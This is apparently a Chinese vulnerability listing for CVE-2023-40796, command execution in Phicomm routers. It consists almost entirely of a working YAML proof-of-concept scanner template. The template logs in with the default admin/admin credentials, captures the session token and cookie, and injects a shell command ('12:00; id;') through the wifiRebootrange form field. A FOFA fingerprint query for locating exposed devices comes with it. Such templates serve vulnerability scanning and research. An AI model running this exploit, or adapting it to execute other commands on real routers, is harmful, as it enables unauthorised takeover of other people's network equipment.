漏洞描述
FOFA: icon_hash="-1344736688"
CVE-2023-40796: 斐讯 Phicomm 路由器后台命令执行
PoC代码[已公开]
id: CVE-2023-40796
info:
name: 斐讯 Phicomm 路由器后台命令执行
author: zan8in
severity: critical
verified: true
description: |-
FOFA: icon_hash="-1344736688"
reference:
- https://mp.weixin.qq.com/s/fqZKlwtsUZnrTcWlib_oqQ
tags: phicomm,rce
created: 2023/10/13
set:
hosturl: request.url
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /cgi-bin/luci/admin/login
body: |
action_mode=apply&action_url={{hosturl}}/cgi-bin/luci/admin/login&username=admin&password=YWRtaW4=
expression: response.raw_header.ibcontains(b'set-cookie') && response.status == 302 && response.headers["location"].contains("/admin/index")
output:
search: '"/cgi-bin/luci/;stok=(?P<stok>.*?)/admin/index".bsubmatch(response.raw_header)'
stok: search["stok"]
search1: '"Set-Cookie: (?P<cook>.*?);".bsubmatch(response.raw_header)'
cook: search1["cook"]
r1:
request:
method: POST
path: /cgi-bin/luci/;stok={{stok}}/admin/wifireboot
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
Cookie: "{{cook}}"
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"wifiRebootEnablestatus\"\r\n\
\r\n\
%s\r\n\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"wifiRebootrange\"\r\n\
\r\n\
12:00; id;\r\n\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"wifiRebootendrange\"\r\n\
\r\n\
%s:\r\n\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"cururl2\"\r\n\
\r\n\
\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0() && r1()